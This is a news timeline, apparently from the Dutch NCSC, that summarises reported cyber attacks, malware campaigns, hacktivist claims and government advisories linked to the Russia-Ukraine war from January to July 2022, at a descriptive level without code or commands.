Digital attacks in Ukraine: A Timeline
News item | 10-03-2022 | 11:55
There has been frequent news reporting of digital attacks in Ukraine over the past month. This article provides a chronological overview of the reported cyber attacks and the subsequent publications.
Timeline
July
NCSC UK warned organisations to prepare for a heightened cyberthreat over an extended period, on account of the Russia-Ukraine conflict. In the view of the NCSC the cyberthreat to the UK will continue to rise as a result of the conflict. Organisations are urged to keep their guard up and to have their cybersecurity experts prepare for longer-term resilience .
June
A disinformation campaign was used to spread a rumour that male Ukrainian refugees in Poland would be identified and sent back to Ukraine for military service. Researchers from cybersecurity firm Mandiant have attributed this to the Belarusian-linked threat actor GhostWriter.
According to the Ukrainian state service SSSCIP the intensity of cyberattacks on Ukrainian targets continues unabated. There have been almost 800 cyberattacks since the beginning of the war on 24 February 2022.
CERT-UA warned of cyberattacks using emails with a malicious attachment targeting telecom companies in Ukraine. The emails contain a password-protected RAR file as an attachment with an Excel file and macro. When the file is opened, a PowerShell command is launched, resulting in the download and execution of an EXE file. The system is then infected with DarkCrystal malware.
After Lithuania banned the rail transportation of Russian goods (with the exception of foodstuffs and people) to Kaliningrad, various activist groups used platforms such as Telegram to urge cyberattacks on Lithuania’s critical infrastructure.
Cert-UA warned of cyberattacks against Russian research institutions, technical organisations and government bodies by Chinese-linked actors. The attackers use phishing emails with malicious attachments, which, if opened by the user, will eventually result in infection by Bisonal malware.
Microsoft published a report entitled ‘Defending Ukraine: Early Lessons from the Cyber War’, offering five conclusions after the first four months of the conflict between Russia and Ukraine.
Cert-UA warned of two types of attack. One involves delivery of a malicious xxx.doc file, the other an xxx.rtf file. Both attacks prompt t hedownload of an HTML file and exploitation of the CVE-2022-30190 vulnerability. In the case of the .doc file, Cobalt Strike malware is used, and in the case of the .rtf file, CredoMap malware is deployed. The NCSC recently published an advisory warning about the CVE-2022-30190 vulnerability.
Threat actor Killnet appealed on Telegram to various ransomware actors, such as Conti and Revil, to launch cyberattacks on joint organisations in the United States, Italy and Poland. According to a Kremlin spokesman, a DDoS attack on Friday delayed President Putin’s speech at the International Economic Forum in St Petersburg by an hour.
Hacktivist collective Belarusian Cyber-Partisans claimed to have gained access to wiretapped conversations, including some from the Russian embassy in Belarus. The recordings are said to have been made between 2020 and 2021.
Hacking group Anonymous claimed to have hacked a Russian drone manufacturer. They also published images of some of the information obtained.
Following a cyberattack, the web address for the Ministry of Construction, Housing and Utilities of the Russian Federation was redirected to a pro-Ukrainian message: ‘Glory to Ukraine’. The hackers also demanded a ransom in order to prevent the leaking of site users’ personal data. According to RIA, a Russian state news outlet, a ministry representative confirmed that the site was offline but that user data had not been compromised.
The broadcasting of the World Cup qualifier between Wales and Ukraine was interrupted by a cyberattack in Ukraine directed at OLL.TV. According to the State Service of Special Communications and Information Protection of Ukraine (SSSCIP), hackers had gained access to a content delivery network (CDN) and had then managed to reroute traffic. As a result, various Ukrainian broadcasters displayed Russian propaganda. OLL.TV confirmed the attack on Facebook.
CERT-UA warned of cyberattacks using malicious email attachments targeting various Ukrainian government organisations. The emails deliver a document containing a malicious URL redirecting unsuspecting victims to the HTML file with a JavaScript code embedded. If executed, CVE-2021-40444 and CVE-2022-30190 vulnerabilities are exploited to launch a PowerShell command, download an EXE file and infect the targeted system with Cobalt Strike Beacon malware. The National Cybersecurity Centre (NCSC) has published an advisory regarding the CVE-2022-30190 vulnerability.
Mei
Hacking group Anonymous claimed to have attacked Belarusian government websites in retaliation for Belarus’s alleged support for the Russian invasion.
Researchers at security company SEKOIA.IO have observed cyber reconnaissance activities by Russian threat actor Turla. This observation is based on previous findings by Google’s Threat Analysis Group (TAG) (see also the entry for 3 May 2022 on this timeline). The activities targeted the Baltic Defence College, the Austrian Economic Chamber and NATO’s e-Learning platform known as JADL. The Austrian Economic Chamber was involved in the imposition of sanctions against Russia.
Pro-Russian hackers launched cyberattacks on various Italian government organisations. On Friday 20 May, the Italian embassy in London tweeted that access to the website of the Italian Ministry of Foreign Affairs and its embassies was limited as a result of cyberattacks.
The Italian authorities managed to thwart DDoS attacks by the actor Killnet. These attacks were launched during the Eurovision Song Festival’s live performances and voting rounds. In response to this failed attack, the actor declared its intention to launch cyberattacks on websites of organisations in the United States, the United Kingdom, Germany, Latvia, Romania, Estonia, Poland, Ukraine, Lithuania and Italy.
Threat actor Killnet directed DDoS attacks against various Italian government and commercial websites.
The same day, CERT-UA warned about emails with the subject ‘Щодо проведення акції помсти у Херсоні!’ (‘Re: retaliatory action in Kherson!’) which contain an HTM file. Once the file is clicked on, GammaLoad.PS1_v2 malware is downloaded and executed on the victim’s computer. CERT-UA has attributed this attack to the Russian threat actor UAC-0010 (Gamaredon).
The European Union and its international partners strongly condemned the cyberattack on the satellite KA-SAT network. The attack was attributed to the Russian Federation. It took place shortly before the Russian invasion of Ukraine on 24 February 2022 and had a significant impact on various public authorities, businesses and citizens in Ukraine. Spill-over effects were also felt by several members of the European Union.
Several media outlets reported that as a result of a cyberattack, Russian satellite TV menus had shown various anti-war slogans just before the Victory Day parade in Moscow.
CERT-UA warned of emails with the subject ‘хімічної атаки’ (chemical attack). The emails contain a link to an XLS document with a macro. When the macro is activated, it downloads and executes a piece of malware. The victim’s computer is then infected with the malicious programme JesterStealer, which steals sensitive information and transmits it to the attacker.
Google reported in a blog post that it had observed cyber activities by various actors in relation to the war in Ukraine:
- The Russian-based actor APT28 (aka Fancy Bear) has been targeting users in Ukraine with a new malware variant, which is distributed via email attachments inside password-protected zip files.
- The organisation has again observed activity by the Russian-based threat actor COLDRIVER (see update of 31 March in this timeline). According to Google, phishing emails have been sent to targets including government officials, politicians, NGOs and journalists.
- The Chinese-based actor Curious Gorge is continuing its long-running campaigns against multiple government, manufacturing, military and logistics organisations in Russia and Ukraine.
- Google has observed cyberattacks by the Russian-linked actor Turla, which targets the Baltic states and attempts to compromise defence and cybersecurity organisations in the region.
- Lastly, Google reported that the Belarusian threat actor GhostWriter was still active and was targeting Ukrainian citizens with its phishing attacks.
The UK’s Foreign, Commonwealth & Development Office (FCDO) claimed on the basis of government-funded research that Russian disinformation about the war in Ukraine was being spread by means of a troll factory. According to the FCDO, the accounts of various politicians and specific audiences in the UK, India and South Africa are being targeted. According to the UK experts, the research shows how the Kremlin’s large-scale disinformation campaign is designed to manipulate international public opinion of the war in Ukraine.
April
In collaboration with the Computer Security Incident Response Team of the National Bank of Ukraine (CSIRT-NBU), Ukraine’s Computer Emergency Response Team (Cert-UA) has observed distributed denial-of-service (DDoS) attacks on various Ukrainian government and other organisations. Compromised websites have been used for this purpose. The websites are compromised by inserting malicious JavaScript code (BrownFlood) into the site structure. As a result, website visitors generate large numbers of requests to specific targets, in this case various Ukrainian government and other organisations.
Microsoft issued a report containing details about Russian cyberattacks observed during the war between Russia and Ukraine. Since the Russian invasion, Microsoft has observed over 200 cyberattacks against Ukrainian organisations and individuals. A number of these attacks appeared to be coordinated with kinetic military operations, according to Microsoft. The report, which includes a detailed timeline of the Russian cyberattacks, was released in order to help boost the resilience of organisations including critical providers and central government.
After introducing a new postage stamp, Ukraine’s national postal service, Ukrposhta, was hit by a DDoS attack. The stamp shows a Ukrainian soldier making an offensive gesture to the Russian warship Moskva, which has since sunk.
On the CISA website, the United States, Australia, New Zealand, Canada and the United Kingdom posted a joint warning regarding cyber activity by Russian criminal and state actors aimed at critical infrastructure. This activity may be a form of retaliation for the sanctions imposed on Russia and the material support provided to Ukraine by the Western allies and partners.
Shuckworm (aka Gamaredon and Armageddon), a malicious actor linked to Russia, continues to target organisations in Ukraine. For this purpose it uses various versions of the malware Backdoor.Pterodo. The frequency of the attacks means that it remains one of the main cyber threats facing organisations in the region.
CERT-UA issued a warning about phishing emails that claim to originate from them, with the subject heading ‘Srochno!’ (urgent). The emails, which target Ukrainian organisations, include an .xls attachment which contains a macro. When the macro is activated, it downloads and runs a file that infects the computer with Cobalt Strike Beacon malware.
The activist hacker group KillNet carried out DDoS attacks on various websites belonging to airports, government bodies and transport organisations in Europe. These attacks rendered the sites of some organisations temporarily unavailable.
Analysing an attack on a Ukrainian energy company, cybersecurity firm ESET and the Ukrainian CERT-UA discover new malware, Industroyer2, which targets industrial control systems (ICS). Other pieces of malware, including various wipers, were also used in the attack. For more details about this malware, you can visit the ESET and CERT-UA websites. According to ESET and CERT-UA, the attack was successfully averted.
A denial-of-service attack rendered the websites of the Finnish ministries of Defence and Foreign Affairs temporarily unavailable. The attack started around noon, as Ukraine’s President Zelenskyy was addressing the Finnish parliament.
Microsoft announces that it has been able to disrupt cyberattacks targeting Ukraine. These attacks were launched by Strontium, a Russian state actor with ties to the intelligence service GRU. Strontium was attempting to compromise Ukrainian government institutions and media organisations and was also targeting EU and US government agencies and foreign policy think tanks. In order to gain access to the victims, Strontium used seven malicious internet domains.
CERT-UA reports the discovery of various malicious files that could be used in a spear-phishing attack. The files had English names and were targeting a government organisation in Latvia. CERT-UA has attributed this attack to UAC-0010 (Armageddon).
The same day, CERT-UA also reports that Ukrainian government organisations have been targeted by Armageddon, once again via a spear-phishing attack. Targets received malicious files that purported to contain personal details of suspected war criminals.
March
Google publishes a blog post about the Russian-based threat actor COLDRIVER, alleged to have launched phishing campaigns against various targets, including a NATO department. Google has no evidence that these attempts were successful. The group has been active since 2015 and has in the past attacked various targets such as ministries, NGOs and journalists.
Due to a major distributed denial-of-service (DDoS) attack on the Ukrainian internet service provider Ukrtelecom, services are temporarily unavailable to its clients.
A Russian internet provider launches a brief BGP hijack of Twitter’s address space. The BGP announcement had little effect in the end because Twitter’s BGP announcements are RPKI-protected.
Three Russian spies spent five years targeting energy infrastructure in 135 countries, in an effort to enable the Russian government to gain remote control of power plants, the US Department of Justice alleged in an indictment unsealed on Thursday.
On Twitter hacking group Anonymous calls upon businesses to withdraw from Russia, giving them 48 hours to do so, otherwise they will be targeted by Anonymous. The group has previously published details of Russian companies.
CERT-UA reports new wiper malware known as Double Zero, which is spread through .zip files.
American president Joe Biden warns businesses in his country about potential Russian cyberattacks, including as a response to sanctions imposed by the West against Russia.
CERT-UA warns of attacks by InvisiMole, a hacking group with ties to the Russian advanced persistent threat (APT) group Gamaredon.
Hacking group Anonymous warns Western companies to sever ties with Russia and threatens targeted actions.
Security Affairs posts about a destructive Node-IPC package (malware attack) targeting organisations in Russia and Belarus.
Ukraine’s Computer Emergency Response Team (CERT-UA) reports a phishing campaign in which mass mailings are sent out in the name of the Ukrainian government. The attacks are being launched with the use of Cobalt Strike, GrimPlant and GraphSteel.
ESET researchers in Ukraine have also discovered new wiper malware with the name Caddywiper. Wiper malware presents itself as ransomware, but the affected systems or files cannot be recovered.
Anonymous leaks 20 terabytes of data following a cyberattack on the German subsidiary of the Russian oil company, Rosneft. In response, the German intelligence service, BSI, has issued a warning to vital sectors.
Der Spiegel reports that Germany’s Federal Office for Information Security (BSI), a division of the German Federal Ministry of the Interior and Community, is warning of a cyberattack, which is expected to target critical infrastructure. This is in retaliation for the help offered to Ukraine by Germany since the beginning of the war.
The Security Service of Ukraine, SSU, reports that hackers have posted messages of surrender on local government websites. The SSU announces on Twitter that this is disinformation and urges people to ignore the messages. The Ukrainian ambassador to the United Kingdom also tweets that the official website and email were not working because of cyberattacks.
The Ukrainian government urges tech companies to sever their business ties to Russia. Various tech companies stop providing some or all services to Russia. Cybersecurity firm Proofpoint reports a spear-phishing campaign by various state actors targeting European government organisations. The campaign appears to be an attempt by threat actors to obtain information regarding the reception and migration of Ukrainian refugees.
February
The Belarussian Cyber-Partisans claimed that they conducted a cyber attack on the railways in Belarus, to obstruct the Russian transfer of troops. A recent overview of cyber groups that have mingled in the war, including state actors such as Sandworm, can be found here.
Taking the latest developments into consideration, the NCSC has published a perspective for action and threat-specific measures.
At this moment, there have been no observations of digital attacks on the Netherlands or its interests.
Ransomware rival Lockbit, in contrast,reported that it remains neutral in the war and is exclusively motivated by financial purposes.
The Ukrainian minister of Digital Transformation called for hackers worldwide to align with an “Ukrainian IT army”.
Ransomware-group Conti declared in a public statement to align itself with Russia. To support Russia, Conti threatens with attacks on critical infrastructure of countries opposing Russia.
After the invasion of Russian troops in Ukraine various non-state actors have mingled in the conflict. Already on the same evening, hackers-collective Anonymous declared the war on Russia. Volunteers connected to this collective then claimed to have taken down various Russian government- and media websites through DDoS-attacks. It was also claimed that sensitive data from the Russian Ministry of Defense was obtained. These claims cannot always be verified, which could cause uncertainty and confusion.
Various parties reported a new wiper malware that they had observed in Ukrainian systems. Among others, ESET, Symantec and SentielOne published their analyses. The malware has been called HermeticWiper. There are functional similarities with the earlier observed WhisperGate wiper campaign of January 13th and 14th. The goal of the new wiper is to corrupt new documents and to prevent the startup of computer systems. This new malware seems to operate more thoroughly than the wiper malware used in the previous campaign. Thus far, there have been no indications that this new wiper has any functionality that could lead to a worm through which the network-coupled systems could be infected.
The Ukrainian CERT-UA published a website report on malicious activities that they related to the actor Buhtrap. The malware campaigns would have been intended to acquire a position in the computer network of the victim. On February 23rd, severe DDoS-attacks were carried out on Ukrainian targets. Various government websites have been temporarily limited or fully unavailable. Among others, the websites of various ministries targeted. Simultaneously, multiple phishing campaigns were reported.
Various cyber-attacks were conducted on different targets in Ukraine. Among others, DDoS-attacks (Distributed Denial of Service) were reported that target the capacity of online services or the supporting servers and network equipment. The Ministry of Defense and two national banks in Ukraine were hit.
Another texting-campaign took place, that reported that ATMs were having a technical malfunction. Official authorities in Ukraine reported that this was disinformation. There would have been no existence of such malfunctions. At this moment, the NSCS has no concrete clues that targeted attacks on organizations in the Netherlands are related to the current situation in Ukraine.
January
CERT Ukraine (CERT UA) published part of the research on both the defacements as well as the attack with malware. In this research, large similarities were detected between the Whispergate-malware and WhiteBlackCrypt ransomware. These similarities would indicate that it was the intention of the attacker to prevent that Ukraine itself was behind the cyber-attacks.
Microsoft published a blog on the Whisptergate-malware (also called Whisperkill) that had been deployed against various (governmental)organizations in Ukraine. Whispergate is a wiperware that pretends to be ransomware, but lacks any possibility to recover affected systems or documents, which means that documents are effectively erased or that the operating system becomes out of commission. In contrast to the NotPetya-wiper, that had a worldwide impact in 2017, the Whispergate-malware does not consist of the possibility to spread itself without a human intermediary. As a result, the observed Whispergate-malware forms a significantly lower risk for the Netherlands.
The Ukrainian security service SSU published a statement about an attack on the websites of various governmental actors. The messages that were published on the websites reported in threatening language in Polish, Ukrainian and Russian that personal data of Ukrainian citizens had been stolen and that citizens should “prepare for the worst”. These kind of attacks where a website is being daubed are also called ‘defacements’. In a subsequent statement by the SSU, it became evident that there had most likely been a supply chain attack on the supplier who maintained the websites, possibly in combination with a vulnerability in OctoberrCMS (CVE-2021-32648) and Log4j. The supplier had elevated permissions in the environment so that websites could be modified.
After the large attacks the national CERT of Ukraine issued multiple warnings for other campaigns that target governmental agencies. Moreover, several cybersecurity companies published a research following the cyber-attacks in Ukraine. For instance, Palo Alto Networks Unit42, Symantec and Microsoft conducted a research on the activities of Gamaredon, also known as ACTINIUM. Thus far, the activities of Gamaredon have not been related to the cyber-attacks of January the 14th. Gamaredon is a well-known actor that thus far has focused on Ukrainian targets.
Perspective for action
The WhisperGate-attack or the other executed attacks in Ukraine have not led to so-called ‘spill-over effects’ in the Netherlands. However, it is recommended to act in accordance with the NCSC’s basis measures on cybersecurity, and to take note of the AIVD and MIVD publication, “Cyberattacks by statal actors, seven moments to stop an attack’’ [available in Dutch only]. In particular, the basic measure of ‘segmented networking’ can help to prevent that an attack on a coupled network could affect your organization.
The NCSC keeps monitoring the developments closely and shares relevant information wherever possible.